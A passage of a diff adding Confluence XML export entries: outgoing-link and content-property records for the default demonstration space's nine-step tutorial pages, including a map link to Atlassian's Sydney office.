+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196653</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196646</id>
+<property name="destinationPageTitle"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196647</id>
+<property name="destinationPageTitle"><![CDATA[What is Confluence? (step 1 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[what is confluence? (step 1 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196648</id>
+<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196649</id>
+<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196642</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196643</id>
+<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196644</id>
+<property name="destinationPageTitle"><![CDATA[//maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=Atlassian,+George+Street,+New+South+Wales,+Australia&radiu]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[//maps.google.com/maps?q=atlassian,+george+street,+new+south+wales,+australia&hl=en&ll=-33.866572,151.207001&spn=0.004321,0.008256&sll=-33.870509,151.203707&sspn=0.008641,0.016512&oq=atlassian,&hq=atlassian,+george+street,+new+south+wales,+australia&radiu]]></property>
+<property name="destinationSpaceKey"><![CDATA[https]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[https]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196645</id>
+<property name="destinationPageTitle"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196638</id>
+<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196639</id>
+<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196640</id>
+<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196641</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196634</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196635</id>
+<property name="destinationPageTitle"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196636</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196637</id>
+<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196630</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196631</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196632</id>
+<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196633</id>
+<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196626</id>
+<property name="destinationPageTitle"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196627</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196628</id>
+<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196629</id>
+<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196622</id>
+<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196623</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196624</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262272</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196625</id>
+<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262271</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">14</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196618</id>
+<property name="destinationPageTitle"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262270</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196619</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262269</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">9061</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196620</id>
+<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262268</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196621</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262267</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196614</id>
+<property name="destinationPageTitle"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262266</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196615</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262265</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196616</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262264</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">9592</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196617</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262263</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196610</id>
+<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262262</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196611</id>
+<property name="destinationPageTitle"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262261</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196612</id>
+<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262260</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196613</id>
+<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
+<property name="destinationSpaceKey"><![CDATA[ds]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262259</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">34478</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262258</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262257</id>
